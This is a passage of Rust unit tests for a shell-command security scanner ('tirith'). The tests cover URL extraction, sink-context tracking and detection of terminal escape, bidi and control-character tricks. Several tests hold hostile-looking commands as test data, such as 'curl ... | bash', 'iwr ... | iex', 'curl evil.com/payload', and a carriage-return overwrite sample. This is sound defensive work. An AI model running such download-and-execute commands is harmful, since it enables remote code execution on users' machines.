1123        assert!(tier1_scan("open file.zip", ScanContext::Exec));
1124    }
1125
1126    #[test]
1127    fn test_tier1_exec_matches_shortener() {
1128        assert!(tier1_scan("curl bit.ly/abc", ScanContext::Exec));
1129    }
1130
1131    #[test]
1132    fn test_tier1_paste_matches_non_ascii() {
1133        assert!(tier1_scan("café", ScanContext::Paste));
1134    }
1135
1136    #[test]
1137    fn test_tier1_paste_exec_patterns_also_match() {
1138        assert!(tier1_scan("curl https://example.com", ScanContext::Paste));
1139    }
1140
1141    #[test]
1142    fn test_tier1_exec_no_non_ascii() {
1143        // Non-ASCII should NOT trigger exec-time scan
1144        assert!(!tier1_scan("echo café", ScanContext::Exec));
1145    }
1146
1147    #[test]
1148    fn test_byte_scan_ansi() {
1149        let input = b"hello \x1b[31mred\x1b[0m world";
1150        let result = scan_bytes(input);
1151        assert!(result.has_ansi_escapes);
1152    }
1153
1154    #[test]
1155    fn test_byte_scan_control_chars() {
1156        let input = b"hello\rworld";
1157        let result = scan_bytes(input);
1158        assert!(result.has_control_chars);
1159    }
1160
1161    #[test]
1162    fn test_byte_scan_bidi() {
1163        let input = "hello\u{202E}dlrow".as_bytes();
1164        let result = scan_bytes(input);
1165        assert!(result.has_bidi_controls);
1166    }
1167
1168    #[test]
1169    fn test_byte_scan_zero_width() {
1170        let input = "hel\u{200B}lo".as_bytes();
1171        let result = scan_bytes(input);
1172        assert!(result.has_zero_width);
1173    }
1174
1175    #[test]
1176    fn test_byte_scan_clean() {
1177        let input = b"hello world\n";
1178        let result = scan_bytes(input);
1179        assert!(!result.has_ansi_escapes);
1180        assert!(!result.has_control_chars);
1181        assert!(!result.has_bidi_controls);
1182        assert!(!result.has_zero_width);
1183    }
1184
1185    #[test]
1186    fn test_extract_urls_basic() {
1187        let urls = extract_urls("curl https://example.com/install.sh", ShellType::Posix);
1188        assert_eq!(urls.len(), 1);
1189        assert_eq!(urls[0].raw, "https://example.com/install.sh");
1190    }
1191
1192    #[test]
1193    fn test_extract_urls_from_leading_env_assignment() {
1194        let urls = extract_urls(
1195            "PAYLOAD_URL=https://example.com/install.sh curl ok",
1196            ShellType::Posix,
1197        );
1198        assert!(
1199            urls.iter()
1200                .any(|u| u.raw == "https://example.com/install.sh" && u.in_sink_context),
1201            "leading env assignment URL should be extracted in sink context"
1202        );
1203    }
1204
1205    #[test]
1206    fn test_extract_urls_from_quoted_leading_env_assignment() {
1207        let urls = extract_urls(
1208            "PAYLOAD_URL='https://example.com/install.sh' curl ok",
1209            ShellType::Posix,
1210        );
1211        assert!(
1212            urls.iter()
1213                .any(|u| u.raw == "https://example.com/install.sh"),
1214            "quoted leading env assignment URL should be extracted"
1215        );
1216    }
1217
1218    #[test]
1219    fn test_proxy_env_assignment_url_is_not_treated_as_destination() {
1220        let urls = extract_urls(
1221            "HTTP_PROXY=http://proxy:8080 curl https://example.com/data",
1222            ShellType::Posix,
1223        );
1224        assert!(
1225            !urls.iter().any(|u| u.raw == "http://proxy:8080"),
1226            "proxy configuration URLs should not be treated as destinations"
1227        );
1228    }
1229
1230    #[test]
1231    fn test_extract_urls_pipe() {
1232        let urls = extract_urls(
1233            "curl https://example.com/install.sh | bash",
1234            ShellType::Posix,
1235        );
1236        assert!(!urls.is_empty());
1237        assert!(urls[0].in_sink_context);
1238    }
1239
1240    #[test]
1241    fn test_extract_urls_scp() {
1242        let urls = extract_urls("git clone git@github.com:user/repo.git", ShellType::Posix);
1243        assert!(!urls.is_empty());
1244        assert!(matches!(urls[0].parsed, UrlLike::Scp { .. }));
1245    }
1246
1247    #[test]
1248    fn test_extract_docker_ref() {
1249        let urls = extract_urls("docker pull nginx", ShellType::Posix);
1250        let docker_urls: Vec<_> = urls
1251            .iter()
1252            .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
1253            .collect();
1254        assert_eq!(docker_urls.len(), 1);
1255    }
1256
1257    #[test]
1258    fn test_extract_powershell_iwr() {
1259        let urls = extract_urls(
1260            "iwr https://example.com/script.ps1 | iex",
1261            ShellType::PowerShell,
1262        );
1263        assert!(!urls.is_empty());
1264    }
1265
1266    #[test]
1267    fn test_wrapper_preserves_sink_context() {
1268        let urls = extract_urls(
1269            "env --ignore-environment curl http://example.com",
1270            ShellType::Posix,
1271        );
1272        assert!(
1273            urls.iter()
1274                .any(|u| u.raw == "http://example.com" && u.in_sink_context),
1275            "wrapped sink commands should keep sink context"
1276        );
1277    }
1278
1279    #[test]
1280    fn test_env_wrapper_preserves_tirith_run_sink_context() {
1281        let urls = extract_urls("env tirith run http://example.com", ShellType::Posix);
1282        assert!(
1283            urls.iter()
1284                .any(|u| u.raw == "http://example.com" && u.in_sink_context),
1285            "env wrapper should preserve tirith run sink context"
1286        );
1287    }
1288
1289    #[test]
1290    fn test_command_wrapper_preserves_tirith_run_sink_context() {
1291        let urls = extract_urls("command tirith run http://example.com", ShellType::Posix);
1292        assert!(
1293            urls.iter()
1294                .any(|u| u.raw == "http://example.com" && u.in_sink_context),
1295            "command wrapper should preserve tirith run sink context"
1296        );
1297    }
1298
1299    #[test]
1300    fn test_time_wrapper_preserves_tirith_run_sink_context() {
1301        let urls = extract_urls("time tirith run http://example.com", ShellType::Posix);
1302        assert!(
1303            urls.iter()
1304                .any(|u| u.raw == "http://example.com" && u.in_sink_context),
1305            "time wrapper should preserve tirith run sink context"
1306        );
1307    }
1308
1309    #[test]
1310    fn test_strip_quotes_single_char() {
1311        assert_eq!(strip_quotes("\""), "\"");
1312        assert_eq!(strip_quotes("'"), "'");
1313    }
1314
1315    #[test]
1316    fn test_strip_quotes_empty() {
1317        assert_eq!(strip_quotes(""), "");
1318    }
1319
1320    #[test]
1321    fn test_scan_bytes_bel_vt_del() {
1322        // BEL (0x07)
1323        let input = b"hello\x07world";
1324        let result = scan_bytes(input);
1325        assert!(result.has_control_chars);
1326
1327        // VT (0x0B)
1328        let input = b"hello\x0Bworld";
1329        let result = scan_bytes(input);
1330        assert!(result.has_control_chars);
1331
1332        // FF (0x0C)
1333        let input = b"hello\x0Cworld";
1334        let result = scan_bytes(input);
1335        assert!(result.has_control_chars);
1336
1337        // DEL (0x7F)
1338        let input = b"hello\x7Fworld";
1339        let result = scan_bytes(input);
1340        assert!(result.has_control_chars);
1341    }
1342
1343    #[test]
1344    fn test_scan_bytes_osc_apc_dcs() {
1345        // OSC: \e]
1346        let input = b"hello\x1b]0;title\x07world";
1347        let result = scan_bytes(input);
1348        assert!(result.has_ansi_escapes);
1349
1350        // APC: \e_
1351        let input = b"hello\x1b_dataworld";
1352        let result = scan_bytes(input);
1353        assert!(result.has_ansi_escapes);
1354
1355        // DCS: \eP
1356        let input = b"hello\x1bPdataworld";
1357        let result = scan_bytes(input);
1358        assert!(result.has_ansi_escapes);
1359    }
1360
1361    #[test]
1362    fn test_schemeless_long_tld() {
1363        assert!(looks_like_schemeless_host("example.academy"));
1364        assert!(looks_like_schemeless_host("example.photography"));
1365    }
1366
1367    #[test]
1368    fn test_segment_index_correct() {
1369        let urls = extract_urls("curl https://a.com | wget https://b.com", ShellType::Posix);
1370        // Each URL should have the segment index of the segment it came from
1371        for url in &urls {
1372            // segment_index should be 0 or 1, not an incrementing counter
1373            assert!(url.segment_index <= 1);
1374        }
1375    }
1376
1377    #[test]
1378    fn test_docker_build_context_not_image() {
1379        let urls = extract_urls("docker build .", ShellType::Posix);
1380        let docker_urls: Vec<_> = urls
1381            .iter()
1382            .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
1383            .collect();
1384        assert_eq!(
1385            docker_urls.len(),
1386            0,
1387            "build context '.' should not be treated as image"
1388        );
1389    }
1390
1391    #[test]
1392    fn test_docker_image_subcmd() {
1393        let urls = extract_urls("docker image pull nginx", ShellType::Posix);
1394        let docker_urls: Vec<_> = urls
1395            .iter()
1396            .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
1397            .collect();
1398        assert_eq!(docker_urls.len(), 1);
1399    }
1400
1401    #[test]
1402    fn test_docker_run_image_after_double_dash() {
1403        let urls = extract_urls(
1404            "docker run --rm -- evil.registry/ns/img:1",
1405            ShellType::Posix,
1406        );
1407        let docker_urls: Vec<_> = urls
1408            .iter()
1409            .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
1410            .collect();
1411        assert_eq!(docker_urls.len(), 1);
1412        assert_eq!(docker_urls[0].raw, "evil.registry/ns/img:1");
1413    }
1414
1415    /// Constraint #2: Verify that EXTRACTOR_IDS is non-empty and
1416    /// that all generated fragment counts are positive.
1417    /// This is a module boundary enforcement test — ensures no secret
1418    /// extractors exist outside the declarative pattern table.
1419    #[test]
1420    fn test_tier1_module_boundary_enforcement() {
1421        // Verify extractor IDs are generated
1422        let ids = tier1_generated::EXTRACTOR_IDS;
1423        assert!(!ids.is_empty(), "EXTRACTOR_IDS must not be empty");
1424        // Verify exec and paste fragment counts
1425        let exec_count = tier1_generated::TIER1_EXEC_FRAGMENT_COUNT;
1426        let paste_count = tier1_generated::TIER1_PASTE_FRAGMENT_COUNT;
1427        assert!(exec_count > 0, "Must have exec fragments");
1428        assert!(
1429            paste_count >= exec_count,
1430            "Paste fragments must be superset of exec fragments"
1431        );
1432        // Verify the generated patterns are valid regexes
1433        Regex::new(tier1_generated::TIER1_EXEC_PATTERN)
1434            .expect("Generated exec pattern must be valid regex");
1435        Regex::new(tier1_generated::TIER1_PASTE_PATTERN)
1436            .expect("Generated paste pattern must be valid regex");
1437    }
1438
1439    // ─── CR normalization tests ───
1440
1441    #[test]
1442    fn test_scan_bytes_trailing_cr_not_flagged() {
1443        let result = scan_bytes(b"/path\r");
1444        assert!(
1445            !result.has_control_chars,
1446            "trailing \\r should not be flagged"
1447        );
1448    }
1449
1450    #[test]
1451    fn test_scan_bytes_trailing_crlf_not_flagged() {
1452        let result = scan_bytes(b"/path\r\n");
1453        assert!(
1454            !result.has_control_chars,
1455            "trailing \\r\\n should not be flagged"
1456        );
1457    }
1458
1459    #[test]
1460    fn test_scan_bytes_windows_multiline_not_flagged() {
1461        let result = scan_bytes(b"line1\r\nline2\r\n");
1462        assert!(
1463            !result.has_control_chars,
1464            "Windows \\r\\n line endings should not be flagged"
1465        );
1466    }
1467
1468    #[test]
1469    fn test_scan_bytes_embedded_cr_still_flagged() {
1470        let result = scan_bytes(b"safe\rmalicious");
1471        assert!(
1472            result.has_control_chars,
1473            "embedded \\r before non-\\n should be flagged"
1474        );
1475    }
1476
1477    #[test]
1478    fn test_scan_bytes_mixed_crlf_and_attack_cr() {
1479        let result = scan_bytes(b"line1\r\nfake\roverwrite\r\n");
1480        assert!(
1481            result.has_control_chars,
1482            "attack \\r mixed with \\r\\n should be flagged"
1483        );
1484    }
1485
1486    #[test]
1487    fn test_scan_bytes_only_cr() {
1488        let result = scan_bytes(b"\r");
1489        assert!(
1490            !result.has_control_chars,
1491            "lone trailing \\r should not be flagged"
1492        );
1493    }
1494
1495    #[test]
1496    fn test_schemeless_skip_curl_output_flag() {
1497        let urls = extract_urls("curl -o lenna.png https://example.com", ShellType::Posix);
1498        // Should NOT have schemeless URL for lenna.png
1499        let schemeless: Vec<_> = urls
1500            .iter()
1501            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
1502            .collect();
1503        assert!(
1504            schemeless.is_empty(),
1505            "lenna.png should not be detected as schemeless URL"
1506        );
1507    }
1508
1509    #[test]
1510    fn test_schemeless_skip_curl_output_combined() {
1511        let urls = extract_urls("curl -olenna.png https://example.com", ShellType::Posix);
1512        let schemeless: Vec<_> = urls
1513            .iter()
1514            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
1515            .collect();
1516        assert!(
1517            schemeless.is_empty(),
1518            "-olenna.png should not be detected as schemeless URL"
1519        );
1520    }
1521
1522    #[test]
1523    fn test_schemeless_skip_wget_output_flag() {
1524        let urls = extract_urls("wget -O output.html https://example.com", ShellType::Posix);
1525        let schemeless: Vec<_> = urls
1526            .iter()
1527            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
1528            .collect();
1529        assert!(
1530            schemeless.is_empty(),
1531            "output.html should not be detected as schemeless URL"
1532        );
1533    }
1534
1535    #[test]
1536    fn test_schemeless_skip_wget_combined() {
1537        let urls = extract_urls("wget -Ooutput.html https://example.com", ShellType::Posix);
1538        let schemeless: Vec<_> = urls
1539            .iter()
1540            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
1541            .collect();
1542        assert!(
1543            schemeless.is_empty(),
1544            "-Ooutput.html should not be detected as schemeless URL"
1545        );
1546    }
1547
1548    #[test]
1549    fn test_schemeless_real_domain_still_detected() {
1550        let urls = extract_urls("curl evil.com/payload", ShellType::Posix);
1551        let schemeless: Vec<_> = urls
1552            .iter()
1553            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
1554            .collect();
1555        assert!(
1556            !schemeless.is_empty(),
1557            "evil.com/payload should be detected as schemeless URL"
1558        );
1559    }
1560
1561    #[test]
1562    fn test_schemeless_user_at_host_detected_in_sink_context() {
1563        let urls = extract_urls("curl user@bit.ly", ShellType::Posix);
1564        let schemeless: Vec<_> = urls
1565            .iter()
1566            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
1567            .collect();
1568        assert_eq!(schemeless.len(), 1);
1569        assert_eq!(schemeless[0].raw, "user@bit.ly");
1570    }
1571
1572    #[test]
1573    fn test_scp_user_at_host_not_treated_as_schemeless_url() {
1574        let urls = extract_urls("scp user@server.com file.txt", ShellType::Posix);
1575        let schemeless: Vec<_> = urls
1576            .iter()
1577            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
1578            .collect();
1579        assert!(schemeless.is_empty());
1580    }
1581
1582    #[test]
1583    fn test_schemeless_png_no_slash_is_file() {
1584        assert!(!looks_like_schemeless_host("lenna.png"));
1585    }
1586
1587    #[test]
1588    fn test_schemeless_tld_overlap_with_path_is_domain() {
1589        // evil.zip/payload has a path component, so the .zip extension heuristic
1590        // should NOT suppress it — evil.zip is a real TLD and this is a domain.
1591        assert!(looks_like_schemeless_host("evil.zip/payload"));
1592        assert!(looks_like_schemeless_host("evil.sh/payload"));
1593    }
1594
1595    #[test]
1596    fn test_schemeless_tld_overlap_without_path_is_file() {
1597        // Without a path, lenna.zip / script.sh look like filenames, not domains.
1598        assert!(!looks_like_schemeless_host("lenna.zip"));
1599        assert!(!looks_like_schemeless_host("script.sh"));
1600    }
1601
1602    #[test]
1603    fn test_schemeless_tld_overlap_sink_context_detected() {
1604        // In a real sink context, evil.zip/payload should be detected as schemeless URL.
1605        let urls = extract_urls("curl evil.zip/payload", ShellType::Posix);
1606        let schemeless: Vec<_> = urls
1607            .iter()
1608            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
1609            .collect();
1610        assert!(
1611            !schemeless.is_empty(),
1612            "evil.zip/payload should be detected as schemeless URL in sink context"
1613        );
1614    }
1615}
tirith_core/extract.rs

tirith_core/
extract.rs